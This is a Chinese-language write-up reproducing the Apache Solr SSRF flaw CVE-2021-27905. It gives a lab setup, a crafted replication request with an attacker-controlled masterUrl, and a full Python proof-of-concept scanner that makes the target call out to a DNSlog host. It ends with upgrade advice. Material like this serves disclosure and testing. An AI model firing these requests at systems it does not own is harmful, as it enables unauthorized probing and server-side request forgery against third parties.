0x00漏洞概述
Apache solr是一個開源的搜索服務,使用java編寫,運行在serblet容器的一個獨立的全文搜索服務器,是apache luncene項目的開源企業搜索平台。
0x01影響范圍
Apache solr <=8.8.2
0x02漏洞復現
1、本次復現使用的是apache solr8.8.1版本,下載完成后解壓進入bin目錄,執行:
Solr start -p 8983 //啟動環境
(下載鏈接:http://archive.apache.org/dist/lucene/solr/8.8.1/)
2、點擊Core Admin創建core發現報錯
此時solr在server/solr目錄下已經創建了名字new_core的文件夾,我們把server/solr/configsets/default文件夾下的conf文件復制到新建的new_core文件下:
此時即可創建成功;
訪問http://127.0.0.1:8983/solr/admin/cores?indexInfo=false&wt=json,便可以看到core的名字:
3、SSRF數據包(其中core為實際節點的core值,dnslog為Dnslog的地址):
GET /solr/{core}/replication?command=fetchindex&masterUrl={dnslog} HTTP/1.1
Host: IP
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
Referer: http://IP/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
4、POC復現:
POC:
# CVE-2021-27905 # Apache solr ssrf import requests import urllib3 import json import sys, getopt urllib3.disable_warnings() def title(): print("[-------------------------------------------------------------]") print("[-------------- Apache Solr SSRF漏洞 ---------------]") print("[-------- CVE-2021-27905 ----------]") print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]") print("[-------- Author:Henry4E36 ------------]") print("[-------------------------------------------------------------]") def commit(): url = "" try: opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="]) for op, value in opt: if op == "-h" or op == "--help": print(""" [-] Apache Solr SSRF漏洞 (CVE-2021-27905) [-] Options: -h or --help : 方法說明 -u or --url : 站點URL地址 -d or --dnslog : DnsLog """) sys.exit(0) elif op == "-u" or op == "--url=": url = value elif op == "-d" or op == "--dnslog=": dnslog = value else: print("[-] 參數有誤! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") sys.exit() return url, dnslog except Exception as e: print("[-] 參數有誤! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") sys.exit(0) def target_core(url): target_url = url + "/solr/admin/cores?indexInfo=false&wt=json" headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" } try: res = requests.get(url=target_url,headers=headers,verify=False,timeout=5) core = list(json.loads(res.text)["status"])[0] return core except Exception as e: print(f"[!] 目標系統: {url} 出現意外!n ",e) def ssrf(core,dnslog): target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}" headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" } try: res = requests.get(url=target_url, headers=headers, verify=False, timeout=5) status = json.loads(res.text)["status"] if res.status_code == 200 and status == "OK": print(f"[!] 33[31m目標系統: {url} 可能存在SSRF漏洞,請檢查DNSLog響應!33[0m") else: print(f"[0] 目標系統: {url} 不存在SSRF漏洞") except Exception as e: print(f"[!] 目標系統: {url} 出現意外!n ", e) if __name__ == "__main__": title() url ,dnslog = commit() core = target_core(url) ssrf(core,dnslog)
0x03修復建議:
升級到最新版本
下載地址:https://solr.apache.org/downloads.html